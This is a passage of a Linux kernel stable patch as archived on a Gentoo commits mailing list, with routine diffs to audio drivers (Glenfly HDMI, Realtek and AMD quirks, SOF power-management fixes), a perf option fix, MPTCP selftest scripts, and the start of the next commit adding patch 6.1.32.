+--- a/sound/core/oss/pcm_plugin.h
++++ b/sound/core/oss/pcm_plugin.h
+@@ -141,6 +141,14 @@ int snd_pcm_area_copy(const struct snd_pcm_channel_area *src_channel,
+ 
+ void *snd_pcm_plug_buf_alloc(struct snd_pcm_substream *plug, snd_pcm_uframes_t size);
+ void snd_pcm_plug_buf_unlock(struct snd_pcm_substream *plug, void *ptr);
++#else
++
++static inline snd_pcm_sframes_t snd_pcm_plug_client_size(struct snd_pcm_substream *handle, snd_pcm_uframes_t drv_size) { return drv_size; }
++static inline snd_pcm_sframes_t snd_pcm_plug_slave_size(struct snd_pcm_substream *handle, snd_pcm_uframes_t clt_size) { return clt_size; }
++static inline int snd_pcm_plug_slave_format(int format, const struct snd_mask *format_mask) { return format; }
++
++#endif
++
+ snd_pcm_sframes_t snd_pcm_oss_write3(struct snd_pcm_substream *substream,
+ 				     const char *ptr, snd_pcm_uframes_t size,
+ 				     int in_kernel);
+@@ -151,14 +159,6 @@ snd_pcm_sframes_t snd_pcm_oss_writev3(struct snd_pcm_substream *substream,
+ snd_pcm_sframes_t snd_pcm_oss_readv3(struct snd_pcm_substream *substream,
+ 				     void **bufs, snd_pcm_uframes_t frames);
+ 
+-#else
+-
+-static inline snd_pcm_sframes_t snd_pcm_plug_client_size(struct snd_pcm_substream *handle, snd_pcm_uframes_t drv_size) { return drv_size; }
+-static inline snd_pcm_sframes_t snd_pcm_plug_slave_size(struct snd_pcm_substream *handle, snd_pcm_uframes_t clt_size) { return clt_size; }
+-static inline int snd_pcm_plug_slave_format(int format, const struct snd_mask *format_mask) { return format; }
+-
+-#endif
+-
+ #ifdef PLUGIN_DEBUG
+ #define pdprintf(fmt, args...) printk(KERN_DEBUG "plugin: " fmt, ##args)
+ #else
+diff --git a/sound/pci/hda/hda_intel.c b/sound/pci/hda/hda_intel.c
+index 881b2f3a1551f..3226691ac923c 100644
+--- a/sound/pci/hda/hda_intel.c
++++ b/sound/pci/hda/hda_intel.c
+@@ -227,6 +227,7 @@ enum {
+ 	AZX_DRIVER_ATI,
+ 	AZX_DRIVER_ATIHDMI,
+ 	AZX_DRIVER_ATIHDMI_NS,
++	AZX_DRIVER_GFHDMI,
+ 	AZX_DRIVER_VIA,
+ 	AZX_DRIVER_SIS,
+ 	AZX_DRIVER_ULI,
+@@ -349,6 +350,7 @@ static const char * const driver_short_names[] = {
+ 	[AZX_DRIVER_ATI] = "HDA ATI SB",
+ 	[AZX_DRIVER_ATIHDMI] = "HDA ATI HDMI",
+ 	[AZX_DRIVER_ATIHDMI_NS] = "HDA ATI HDMI",
++	[AZX_DRIVER_GFHDMI] = "HDA GF HDMI",
+ 	[AZX_DRIVER_VIA] = "HDA VIA VT82xx",
+ 	[AZX_DRIVER_SIS] = "HDA SIS966",
+ 	[AZX_DRIVER_ULI] = "HDA ULI M5461",
+@@ -1743,6 +1745,12 @@ static int default_bdl_pos_adj(struct azx *chip)
+ 	}
+ 
+ 	switch (chip->driver_type) {
++	/*
++	 * increase the bdl size for Glenfly Gpus for hardware
++	 * limitation on hdac interrupt interval
++	 */
++	case AZX_DRIVER_GFHDMI:
++		return 128;
+ 	case AZX_DRIVER_ICH:
+ 	case AZX_DRIVER_PCH:
+ 		return 1;
+@@ -1858,6 +1866,12 @@ static int azx_first_init(struct azx *chip)
+ 		pci_write_config_dword(pci, PCI_BASE_ADDRESS_1, 0);
+ 	}
+ #endif
++	/*
++	 * Fix response write request not synced to memory when handle
++	 * hdac interrupt on Glenfly Gpus
++	 */
++	if (chip->driver_type == AZX_DRIVER_GFHDMI)
++		bus->polling_mode = 1;
+ 
+ 	err = pcim_iomap_regions(pci, 1 << 0, "ICH HD audio");
+ 	if (err < 0)
+@@ -1959,6 +1973,7 @@ static int azx_first_init(struct azx *chip)
+ 			chip->playback_streams = ATIHDMI_NUM_PLAYBACK;
+ 			chip->capture_streams = ATIHDMI_NUM_CAPTURE;
+ 			break;
++		case AZX_DRIVER_GFHDMI:
+ 		case AZX_DRIVER_GENERIC:
+ 		default:
+ 			chip->playback_streams = ICH6_NUM_PLAYBACK;
+@@ -2727,6 +2742,12 @@ static const struct pci_device_id azx_ids[] = {
+ 	{ PCI_DEVICE(0x1002, 0xab38),
+ 	  .driver_data = AZX_DRIVER_ATIHDMI_NS | AZX_DCAPS_PRESET_ATI_HDMI_NS |
+ 	  AZX_DCAPS_PM_RUNTIME },
++	/* GLENFLY */
++	{ PCI_DEVICE(0x6766, PCI_ANY_ID),
++	  .class = PCI_CLASS_MULTIMEDIA_HD_AUDIO << 8,
++	  .class_mask = 0xffffff,
++	  .driver_data = AZX_DRIVER_GFHDMI | AZX_DCAPS_POSFIX_LPIB |
++	  AZX_DCAPS_NO_MSI | AZX_DCAPS_NO_64BIT },
+ 	/* VIA VT8251/VT8237A */
+ 	{ PCI_DEVICE(0x1106, 0x3288), .driver_data = AZX_DRIVER_VIA },
+ 	/* VIA GFX VT7122/VX900 */
+diff --git a/sound/pci/hda/patch_hdmi.c b/sound/pci/hda/patch_hdmi.c
+index be2c6cff77011..7b5e09070ab9b 100644
+--- a/sound/pci/hda/patch_hdmi.c
++++ b/sound/pci/hda/patch_hdmi.c
+@@ -4489,6 +4489,22 @@ static int patch_via_hdmi(struct hda_codec *codec)
+ 	return patch_simple_hdmi(codec, VIAHDMI_CVT_NID, VIAHDMI_PIN_NID);
+ }
+ 
++static int patch_gf_hdmi(struct hda_codec *codec)
++{
++	int err;
++
++	err = patch_generic_hdmi(codec);
++	if (err)
++		return err;
++
++	/*
++	 * Glenfly GPUs have two codecs, stream switches from one codec to
++	 * another, need to do actual clean-ups in codec_cleanup_stream
++	 */
++	codec->no_sticky_stream = 1;
++	return 0;
++}
++
+ /*
+  * patch entries
+  */
+@@ -4584,6 +4600,12 @@ HDA_CODEC_ENTRY(0x10de00a6, "GPU a6 HDMI/DP",	patch_nvhdmi),
+ HDA_CODEC_ENTRY(0x10de00a7, "GPU a7 HDMI/DP",	patch_nvhdmi),
+ HDA_CODEC_ENTRY(0x10de8001, "MCP73 HDMI",	patch_nvhdmi_2ch),
+ HDA_CODEC_ENTRY(0x10de8067, "MCP67/68 HDMI",	patch_nvhdmi_2ch),
++HDA_CODEC_ENTRY(0x67663d82, "Arise 82 HDMI/DP",	patch_gf_hdmi),
++HDA_CODEC_ENTRY(0x67663d83, "Arise 83 HDMI/DP",	patch_gf_hdmi),
++HDA_CODEC_ENTRY(0x67663d84, "Arise 84 HDMI/DP",	patch_gf_hdmi),
++HDA_CODEC_ENTRY(0x67663d85, "Arise 85 HDMI/DP",	patch_gf_hdmi),
++HDA_CODEC_ENTRY(0x67663d86, "Arise 86 HDMI/DP",	patch_gf_hdmi),
++HDA_CODEC_ENTRY(0x67663d87, "Arise 87 HDMI/DP",	patch_gf_hdmi),
+ HDA_CODEC_ENTRY(0x11069f80, "VX900 HDMI/DP",	patch_via_hdmi),
+ HDA_CODEC_ENTRY(0x11069f81, "VX900 HDMI/DP",	patch_via_hdmi),
+ HDA_CODEC_ENTRY(0x11069f84, "VX11 HDMI/DP",	patch_generic_hdmi),
+diff --git a/sound/pci/hda/patch_realtek.c b/sound/pci/hda/patch_realtek.c
+index 379f216158ab4..7b5f194513c7b 100644
+--- a/sound/pci/hda/patch_realtek.c
++++ b/sound/pci/hda/patch_realtek.c
+@@ -7063,6 +7063,8 @@ enum {
+ 	ALC225_FIXUP_DELL1_MIC_NO_PRESENCE,
+ 	ALC295_FIXUP_DISABLE_DAC3,
+ 	ALC285_FIXUP_SPEAKER2_TO_DAC1,
++	ALC285_FIXUP_ASUS_SPEAKER2_TO_DAC1,
++	ALC285_FIXUP_ASUS_HEADSET_MIC,
+ 	ALC280_FIXUP_HP_HEADSET_MIC,
+ 	ALC221_FIXUP_HP_FRONT_MIC,
+ 	ALC292_FIXUP_TPT460,
+@@ -8033,6 +8035,22 @@ static const struct hda_fixup alc269_fixups[] = {
+ 		.chained = true,
+ 		.chain_id = ALC269_FIXUP_THINKPAD_ACPI
+ 	},
++	[ALC285_FIXUP_ASUS_SPEAKER2_TO_DAC1] = {
++		.type = HDA_FIXUP_FUNC,
++		.v.func = alc285_fixup_speaker2_to_dac1,
++		.chained = true,
++		.chain_id = ALC245_FIXUP_CS35L41_SPI_2
++	},
++	[ALC285_FIXUP_ASUS_HEADSET_MIC] = {
++		.type = HDA_FIXUP_PINS,
++		.v.pins = (const struct hda_pintbl[]) {
++			{ 0x19, 0x03a11050 },
++			{ 0x1b, 0x03a11c30 },
++			{ }
++		},
++		.chained = true,
++		.chain_id = ALC285_FIXUP_ASUS_SPEAKER2_TO_DAC1
++	},
+ 	[ALC256_FIXUP_DELL_INSPIRON_7559_SUBWOOFER] = {
+ 		.type = HDA_FIXUP_PINS,
+ 		.v.pins = (const struct hda_pintbl[]) {
+@@ -9507,6 +9525,8 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x1043, 0x1313, "Asus K42JZ", ALC269VB_FIXUP_ASUS_MIC_NO_PRESENCE),
+ 	SND_PCI_QUIRK(0x1043, 0x13b0, "ASUS Z550SA", ALC256_FIXUP_ASUS_MIC),
+ 	SND_PCI_QUIRK(0x1043, 0x1427, "Asus Zenbook UX31E", ALC269VB_FIXUP_ASUS_ZENBOOK),
++	SND_PCI_QUIRK(0x1043, 0x1473, "ASUS GU604V", ALC285_FIXUP_ASUS_HEADSET_MIC),
++	SND_PCI_QUIRK(0x1043, 0x1483, "ASUS GU603V", ALC285_FIXUP_ASUS_HEADSET_MIC),
+ 	SND_PCI_QUIRK(0x1043, 0x1517, "Asus Zenbook UX31A", ALC269VB_FIXUP_ASUS_ZENBOOK_UX31A),
+ 	SND_PCI_QUIRK(0x1043, 0x1662, "ASUS GV301QH", ALC294_FIXUP_ASUS_DUAL_SPK),
+ 	SND_PCI_QUIRK(0x1043, 0x1683, "ASUS UM3402YAR", ALC287_FIXUP_CS35L41_I2C_2),
+diff --git a/sound/soc/amd/yc/acp6x-mach.c b/sound/soc/amd/yc/acp6x-mach.c
+index b9958e5553674..84b401b685f7f 100644
+--- a/sound/soc/amd/yc/acp6x-mach.c
++++ b/sound/soc/amd/yc/acp6x-mach.c
+@@ -297,6 +297,13 @@ static const struct dmi_system_id yc_acp_quirk_table[] = {
+ 			DMI_MATCH(DMI_BOARD_NAME, "8A22"),
+ 		}
+ 	},
++	{
++		.driver_data = &acp6x_card,
++		.matches = {
++			DMI_MATCH(DMI_BOARD_VENDOR, "System76"),
++			DMI_MATCH(DMI_PRODUCT_VERSION, "pang12"),
++		}
++	},
+ 	{}
+ };
+ 
+diff --git a/sound/soc/codecs/ssm2602.c b/sound/soc/codecs/ssm2602.c
+index cbbe83b85adaf..cf7927222be15 100644
+--- a/sound/soc/codecs/ssm2602.c
++++ b/sound/soc/codecs/ssm2602.c
+@@ -53,6 +53,18 @@ static const struct reg_default ssm2602_reg[SSM2602_CACHEREGNUM] = {
+ 	{ .reg = 0x09, .def = 0x0000 }
+ };
+ 
++/*
++ * ssm2602 register patch
++ * Workaround for playback distortions after power up: activates digital
++ * core, and then powers on output, DAC, and whole chip at the same time
++ */
++
++static const struct reg_sequence ssm2602_patch[] = {
++	{ SSM2602_ACTIVE, 0x01 },
++	{ SSM2602_PWR,    0x07 },
++	{ SSM2602_RESET,  0x00 },
++};
++
+ 
+ /*Appending several "None"s just for OSS mixer use*/
+ static const char *ssm2602_input_select[] = {
+@@ -589,6 +601,9 @@ static int ssm260x_component_probe(struct snd_soc_component *component)
+ 		return ret;
+ 	}
+ 
++	regmap_register_patch(ssm2602->regmap, ssm2602_patch,
++			      ARRAY_SIZE(ssm2602_patch));
++
+ 	/* set the update bits */
+ 	regmap_update_bits(ssm2602->regmap, SSM2602_LINVOL,
+ 			    LINVOL_LRIN_BOTH, LINVOL_LRIN_BOTH);
+diff --git a/sound/soc/dwc/dwc-i2s.c b/sound/soc/dwc/dwc-i2s.c
+index 7f7dd07c63b2f..3496301582b22 100644
+--- a/sound/soc/dwc/dwc-i2s.c
++++ b/sound/soc/dwc/dwc-i2s.c
+@@ -132,13 +132,13 @@ static irqreturn_t i2s_irq_handler(int irq, void *dev_id)
+ 
+ 		/* Error Handling: TX */
+ 		if (isr[i] & ISR_TXFO) {
+-			dev_err(dev->dev, "TX overrun (ch_id=%d)\n", i);
++			dev_err_ratelimited(dev->dev, "TX overrun (ch_id=%d)\n", i);
+ 			irq_valid = true;
+ 		}
+ 
+ 		/* Error Handling: TX */
+ 		if (isr[i] & ISR_RXFO) {
+-			dev_err(dev->dev, "RX overrun (ch_id=%d)\n", i);
++			dev_err_ratelimited(dev->dev, "RX overrun (ch_id=%d)\n", i);
+ 			irq_valid = true;
+ 		}
+ 	}
+diff --git a/sound/soc/intel/common/soc-acpi-intel-cht-match.c b/sound/soc/intel/common/soc-acpi-intel-cht-match.c
+index 6beb00858c33f..cdcbf04b8832f 100644
+--- a/sound/soc/intel/common/soc-acpi-intel-cht-match.c
++++ b/sound/soc/intel/common/soc-acpi-intel-cht-match.c
+@@ -50,6 +50,31 @@ static struct snd_soc_acpi_mach *cht_quirk(void *arg)
+ 		return mach;
+ }
+ 
++/*
++ * Some tablets with Android factory OS have buggy DSDTs with an ESSX8316 device
++ * in the ACPI tables. While they are not using an ESS8316 codec. These DSDTs
++ * also have an ACPI device for the correct codec, ignore the ESSX8316.
++ */
++static const struct dmi_system_id cht_ess8316_not_present_table[] = {
++	{
++		/* Nextbook Ares 8A */
++		.matches = {
++			DMI_MATCH(DMI_SYS_VENDOR, "Insyde"),
++			DMI_MATCH(DMI_PRODUCT_NAME, "CherryTrail"),
++			DMI_MATCH(DMI_BIOS_VERSION, "M882"),
++		},
++	},
++	{ }
++};
++
++static struct snd_soc_acpi_mach *cht_ess8316_quirk(void *arg)
++{
++	if (dmi_check_system(cht_ess8316_not_present_table))
++		return NULL;
++
++	return arg;
++}
++
+ static const struct snd_soc_acpi_codecs rt5640_comp_ids = {
+ 	.num_codecs = 2,
+ 	.codecs = { "10EC5640", "10EC3276" },
+@@ -113,6 +138,7 @@ struct snd_soc_acpi_mach  snd_soc_acpi_intel_cherrytrail_machines[] = {
+ 		.drv_name = "bytcht_es8316",
+ 		.fw_filename = "intel/fw_sst_22a8.bin",
+ 		.board = "bytcht_es8316",
++		.machine_quirk = cht_ess8316_quirk,
+ 		.sof_tplg_filename = "sof-cht-es8316.tplg",
+ 	},
+ 	/* some CHT-T platforms rely on RT5640, use Baytrail machine driver */
+diff --git a/sound/soc/sof/debug.c b/sound/soc/sof/debug.c
+index ade0507328af4..5042312b1b98d 100644
+--- a/sound/soc/sof/debug.c
++++ b/sound/soc/sof/debug.c
+@@ -437,8 +437,8 @@ void snd_sof_handle_fw_exception(struct snd_sof_dev *sdev, const char *msg)
+ 		/* should we prevent DSP entering D3 ? */
+ 		if (!sdev->ipc_dump_printed)
+ 			dev_info(sdev->dev,
+-				 "preventing DSP entering D3 state to preserve context\n");
+-		pm_runtime_get_noresume(sdev->dev);
++				 "Attempting to prevent DSP from entering D3 state to preserve context\n");
++		pm_runtime_get_if_in_use(sdev->dev);
+ 	}
+ 
+ 	/* dump vital information to the logs */
+diff --git a/sound/soc/sof/pcm.c b/sound/soc/sof/pcm.c
+index 14571b821ecac..be6f38af37b5d 100644
+--- a/sound/soc/sof/pcm.c
++++ b/sound/soc/sof/pcm.c
+@@ -619,16 +619,17 @@ static int sof_pcm_probe(struct snd_soc_component *component)
+ 				       "%s/%s",
+ 				       plat_data->tplg_filename_prefix,
+ 				       plat_data->tplg_filename);
+-	if (!tplg_filename)
+-		return -ENOMEM;
++	if (!tplg_filename) {
++		ret = -ENOMEM;
++		goto pm_error;
++	}
+ 
+ 	ret = snd_sof_load_topology(component, tplg_filename);
+-	if (ret < 0) {
++	if (ret < 0)
+ 		dev_err(component->dev, "error: failed to load DSP topology %d\n",
+ 			ret);
+-		return ret;
+-	}
+ 
++pm_error:
+ 	pm_runtime_mark_last_busy(component->dev);
+ 	pm_runtime_put_autosuspend(component->dev);
+ 
+diff --git a/sound/soc/sof/pm.c b/sound/soc/sof/pm.c
+index 26ffcbb6e30f4..a1bfa5a37e2ad 100644
+--- a/sound/soc/sof/pm.c
++++ b/sound/soc/sof/pm.c
+@@ -159,7 +159,7 @@ static int sof_resume(struct device *dev, bool runtime_resume)
+ 		ret = tplg_ops->set_up_all_pipelines(sdev, false);
+ 		if (ret < 0) {
+ 			dev_err(sdev->dev, "Failed to restore pipeline after resume %d\n", ret);
+-			return ret;
++			goto setup_fail;
+ 		}
+ 	}
+ 
+@@ -173,6 +173,18 @@ static int sof_resume(struct device *dev, bool runtime_resume)
+ 			dev_err(sdev->dev, "ctx_restore IPC error during resume: %d\n", ret);
+ 	}
+ 
++setup_fail:
++#if IS_ENABLED(CONFIG_SND_SOC_SOF_DEBUG_ENABLE_DEBUGFS_CACHE)
++	if (ret < 0) {
++		/*
++		 * Debugfs cannot be read in runtime suspend, so cache
++		 * the contents upon failure. This allows to capture
++		 * possible DSP coredump information.
++		 */
++		sof_cache_debugfs(sdev);
++	}
++#endif
++
+ 	return ret;
+ }
+ 
+diff --git a/sound/soc/sof/sof-client-probes.c b/sound/soc/sof/sof-client-probes.c
+index ddeabbb5580e1..1e521a9e34d27 100644
+--- a/sound/soc/sof/sof-client-probes.c
++++ b/sound/soc/sof/sof-client-probes.c
+@@ -441,12 +441,7 @@ static ssize_t sof_probes_dfs_points_read(struct file *file, char __user *to,
+ 
+ 	ret = sof_probes_points_info(cdev, &desc, &num_desc);
+ 	if (ret < 0)
+-		goto exit;
+-
+-	pm_runtime_mark_last_busy(dev);
+-	err = pm_runtime_put_autosuspend(dev);
+-	if (err < 0)
+-		dev_err_ratelimited(dev, "debugfs read failed to idle %d\n", err);
++		goto pm_error;
+ 
+ 	for (i = 0; i < num_desc; i++) {
+ 		offset = strlen(buf);
+@@ -464,6 +459,13 @@ static ssize_t sof_probes_dfs_points_read(struct file *file, char __user *to,
+ 	ret = simple_read_from_buffer(to, count, ppos, buf, strlen(buf));
+ 
+ 	kfree(desc);
++
++pm_error:
++	pm_runtime_mark_last_busy(dev);
++	err = pm_runtime_put_autosuspend(dev);
++	if (err < 0)
++		dev_err_ratelimited(dev, "debugfs read failed to idle %d\n", err);
++
+ exit:
+ 	kfree(buf);
+ 	return ret;
+diff --git a/tools/perf/builtin-ftrace.c b/tools/perf/builtin-ftrace.c
+index 4bc5b7cf3e04b..1d40f9bcb63bc 100644
+--- a/tools/perf/builtin-ftrace.c
++++ b/tools/perf/builtin-ftrace.c
+@@ -1175,7 +1175,7 @@ int cmd_ftrace(int argc, const char **argv)
+ 	OPT_BOOLEAN('b', "use-bpf", &ftrace.target.use_bpf,
+ 		    "Use BPF to measure function latency"),
+ #endif
+-	OPT_BOOLEAN('n', "--use-nsec", &ftrace.use_nsec,
++	OPT_BOOLEAN('n', "use-nsec", &ftrace.use_nsec,
+ 		    "Use nano-second histogram"),
+ 	OPT_PARENT(common_options),
+ 	};
+diff --git a/tools/testing/selftests/net/mptcp/Makefile b/tools/testing/selftests/net/mptcp/Makefile
+index 43a7236261261..7b936a9268594 100644
+--- a/tools/testing/selftests/net/mptcp/Makefile
++++ b/tools/testing/selftests/net/mptcp/Makefile
+@@ -9,7 +9,7 @@ TEST_PROGS := mptcp_connect.sh pm_netlink.sh mptcp_join.sh diag.sh \
+ 
+ TEST_GEN_FILES = mptcp_connect pm_nl_ctl mptcp_sockopt mptcp_inq
+ 
+-TEST_FILES := settings
++TEST_FILES := mptcp_lib.sh settings
+ 
+ EXTRA_CLEAN := *.pcap
+ 
+diff --git a/tools/testing/selftests/net/mptcp/diag.sh b/tools/testing/selftests/net/mptcp/diag.sh
+index 515859a5168bc..dd730a35bd128 100755
+--- a/tools/testing/selftests/net/mptcp/diag.sh
++++ b/tools/testing/selftests/net/mptcp/diag.sh
+@@ -1,6 +1,8 @@
+ #!/bin/bash
+ # SPDX-License-Identifier: GPL-2.0
+ 
++. "$(dirname "${0}")/mptcp_lib.sh"
++
+ rndh=$(printf %x $sec)-$(mktemp -u XXXXXX)
+ ns="ns1-$rndh"
+ ksft_skip=4
+@@ -25,6 +27,8 @@ cleanup()
+ 	ip netns del $ns
+ }
+ 
++mptcp_lib_check_mptcp
++
+ ip -Version > /dev/null 2>&1
+ if [ $? -ne 0 ];then
+ 	echo "SKIP: Could not run test without ip tool"
+diff --git a/tools/testing/selftests/net/mptcp/mptcp_connect.sh b/tools/testing/selftests/net/mptcp/mptcp_connect.sh
+index 621af6895f4d5..c923ce5ff6eb7 100755
+--- a/tools/testing/selftests/net/mptcp/mptcp_connect.sh
++++ b/tools/testing/selftests/net/mptcp/mptcp_connect.sh
+@@ -1,6 +1,8 @@
+ #!/bin/bash
+ # SPDX-License-Identifier: GPL-2.0
+ 
++. "$(dirname "${0}")/mptcp_lib.sh"
++
+ time_start=$(date +%s)
+ 
+ optstring="S:R:d:e:l:r:h4cm:f:tC"
+@@ -141,6 +143,8 @@ cleanup()
+ 	done
+ }
+ 
++mptcp_lib_check_mptcp
++
+ ip -Version > /dev/null 2>&1
+ if [ $? -ne 0 ];then
+ 	echo "SKIP: Could not run test without ip tool"
+diff --git a/tools/testing/selftests/net/mptcp/mptcp_join.sh b/tools/testing/selftests/net/mptcp/mptcp_join.sh
+index 76a197f7b8132..c7da2bd7c3286 100755
+--- a/tools/testing/selftests/net/mptcp/mptcp_join.sh
++++ b/tools/testing/selftests/net/mptcp/mptcp_join.sh
+@@ -6,6 +6,8 @@
+ # address all other issues detected by shellcheck.
+ #shellcheck disable=SC2086
+ 
++. "$(dirname "${0}")/mptcp_lib.sh"
++
+ ret=0
+ sin=""
+ sinfail=""
+@@ -13,6 +15,7 @@ sout=""
+ cin=""
+ cinfail=""
+ cinsent=""
++tmpfile=""
+ cout=""
+ capout=""
+ ns1=""
+@@ -127,6 +130,8 @@ cleanup_partial()
+ 
+ check_tools()
+ {
++	mptcp_lib_check_mptcp
++
+ 	if ! ip -Version &> /dev/null; then
+ 		echo "SKIP: Could not run test without ip tool"
+ 		exit $ksft_skip
+@@ -164,6 +169,7 @@ cleanup()
+ {
+ 	rm -f "$cin" "$cout" "$sinfail"
+ 	rm -f "$sin" "$sout" "$cinsent" "$cinfail"
++	rm -f "$tmpfile"
+ 	cleanup_partial
+ }
+ 
+@@ -358,9 +364,16 @@ check_transfer()
+ 			fail_test
+ 			return 1
+ 		fi
+-		bytes="--bytes=${bytes}"
++
++		# note: BusyBox's "cmp" command doesn't support --bytes
++		tmpfile=$(mktemp)
++		head --bytes="$bytes" "$in" > "$tmpfile"
++		mv "$tmpfile" "$in"
++		head --bytes="$bytes" "$out" > "$tmpfile"
++		mv "$tmpfile" "$out"
++		tmpfile=""
+ 	fi
+-	cmp -l "$in" "$out" ${bytes} | while read -r i a b; do
++	cmp -l "$in" "$out" | while read -r i a b; do
+ 		local sum=$((0${a} + 0${b}))
+ 		if [ $check_invert -eq 0 ] || [ $sum -ne $((0xff)) ]; then
+ 			echo "[ FAIL ] $what does not match (in, out):"
+diff --git a/tools/testing/selftests/net/mptcp/mptcp_lib.sh b/tools/testing/selftests/net/mptcp/mptcp_lib.sh
+new file mode 100644
+index 0000000000000..3286536b79d55
+--- /dev/null
++++ b/tools/testing/selftests/net/mptcp/mptcp_lib.sh
+@@ -0,0 +1,40 @@
++#! /bin/bash
++# SPDX-License-Identifier: GPL-2.0
++
++readonly KSFT_FAIL=1
++readonly KSFT_SKIP=4
++
++# SELFTESTS_MPTCP_LIB_EXPECT_ALL_FEATURES env var can be set when validating all
++# features using the last version of the kernel and the selftests to make sure
++# a test is not being skipped by mistake.
++mptcp_lib_expect_all_features() {
++	[ "${SELFTESTS_MPTCP_LIB_EXPECT_ALL_FEATURES:-}" = "1" ]
++}
++
++# $1: msg
++mptcp_lib_fail_if_expected_feature() {
++	if mptcp_lib_expect_all_features; then
++		echo "ERROR: missing feature: ${*}"
++		exit ${KSFT_FAIL}
++	fi
++
++	return 1
++}
++
++# $1: file
++mptcp_lib_has_file() {
++	local f="${1}"
++
++	if [ -f "${f}" ]; then
++		return 0
++	fi
++
++	mptcp_lib_fail_if_expected_feature "${f} file not found"
++}
++
++mptcp_lib_check_mptcp() {
++	if ! mptcp_lib_has_file "/proc/sys/net/mptcp/enabled"; then
++		echo "SKIP: MPTCP support is not available"
++		exit ${KSFT_SKIP}
++	fi
++}
+diff --git a/tools/testing/selftests/net/mptcp/mptcp_sockopt.sh b/tools/testing/selftests/net/mptcp/mptcp_sockopt.sh
+index 80d36f7cfee8a..08d8533c98c45 100755
+--- a/tools/testing/selftests/net/mptcp/mptcp_sockopt.sh
++++ b/tools/testing/selftests/net/mptcp/mptcp_sockopt.sh
+@@ -1,6 +1,8 @@
+ #!/bin/bash
+ # SPDX-License-Identifier: GPL-2.0
+ 
++. "$(dirname "${0}")/mptcp_lib.sh"
++
+ ret=0
+ sin=""
+ sout=""
+@@ -81,6 +83,8 @@ cleanup()
+ 	rm -f "$sin" "$sout"
+ }
+ 
++mptcp_lib_check_mptcp
++
+ ip -Version > /dev/null 2>&1
+ if [ $? -ne 0 ];then
+ 	echo "SKIP: Could not run test without ip tool"
+diff --git a/tools/testing/selftests/net/mptcp/pm_netlink.sh b/tools/testing/selftests/net/mptcp/pm_netlink.sh
+index 89839d1ff9d83..32f7533e0919a 100755
+--- a/tools/testing/selftests/net/mptcp/pm_netlink.sh
++++ b/tools/testing/selftests/net/mptcp/pm_netlink.sh
+@@ -1,6 +1,8 @@
+ #!/bin/bash
+ # SPDX-License-Identifier: GPL-2.0
+ 
++. "$(dirname "${0}")/mptcp_lib.sh"
++
+ ksft_skip=4
+ ret=0
+ 
+@@ -34,6 +36,8 @@ cleanup()
+ 	ip netns del $ns1
+ }
+ 
++mptcp_lib_check_mptcp
++
+ ip -Version > /dev/null 2>&1
+ if [ $? -ne 0 ];then
+ 	echo "SKIP: Could not run test without ip tool"
+diff --git a/tools/testing/selftests/net/mptcp/simult_flows.sh b/tools/testing/selftests/net/mptcp/simult_flows.sh
+index 40aeb5a71a2a6..4a417f9d51d67 100755
+--- a/tools/testing/selftests/net/mptcp/simult_flows.sh
++++ b/tools/testing/selftests/net/mptcp/simult_flows.sh
+@@ -1,6 +1,8 @@
+ #!/bin/bash
+ # SPDX-License-Identifier: GPL-2.0
+ 
++. "$(dirname "${0}")/mptcp_lib.sh"
++
+ rndh=$(printf %x $sec)-$(mktemp -u XXXXXX)
+ ns1="ns1-$rndh"
+ ns2="ns2-$rndh"
+@@ -33,6 +35,8 @@ cleanup()
+ 	done
+ }
+ 
++mptcp_lib_check_mptcp
++
+ ip -Version > /dev/null 2>&1
+ if [ $? -ne 0 ];then
+ 	echo "SKIP: Could not run test without ip tool"
+diff --git a/tools/testing/selftests/net/mptcp/userspace_pm.sh b/tools/testing/selftests/net/mptcp/userspace_pm.sh
+index ad6547c79b831..084a2b0a197ec 100755
+--- a/tools/testing/selftests/net/mptcp/userspace_pm.sh
++++ b/tools/testing/selftests/net/mptcp/userspace_pm.sh
+@@ -1,6 +1,10 @@
+ #!/bin/bash
+ # SPDX-License-Identifier: GPL-2.0
+ 
++. "$(dirname "${0}")/mptcp_lib.sh"
++
++mptcp_lib_check_mptcp
++
+ ip -Version > /dev/null 2>&1
+ if [ $? -ne 0 ];then
+ 	echo "SKIP: Cannot not run test without ip tool"


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-06-05 11:48 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-06-05 11:48 UTC (permalink / raw
  To: gentoo-commits

commit:     2ff50bda111e1adfbafd70658521dcaf0e8537ef
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Mon Jun  5 11:48:34 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Mon Jun  5 11:48:34 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=2ff50bda

Linux patch 6.1.32

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README             |    4 +
 1031_linux-6.1.32.patch | 2421 +++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 2425 insertions(+)

diff --git a/0000_README b/0000_README
index f6e14669..a242f865 100644
--- a/0000_README
+++ b/0000_README
@@ -163,6 +163,10 @@ Patch:  1030_linux-6.1.31.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.31
 
+Patch:  1031_linux-6.1.32.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.32
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1031_linux-6.1.32.patch b/1031_linux-6.1.32.patch
new file mode 100644
index 00000000..f4ef09a2
--- /dev/null
+++ b/1031_linux-6.1.32.patch
@@ -0,0 +1,2421 @@
+diff --git a/Makefile b/Makefile
+index 902a6b598c73b..a0c3d8809e93a 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 31
++SUBLEVEL = 32
+ EXTRAVERSION =
+ NAME = Curry Ramen
+ 
+diff --git a/block/blk-map.c b/block/blk-map.c
+index 34735626b00f3..66da9e2b19abf 100644
+--- a/block/blk-map.c
++++ b/block/blk-map.c
+@@ -246,7 +246,7 @@ static struct bio *blk_rq_map_bio_alloc(struct request *rq,
+ {
+ 	struct bio *bio;
+ 
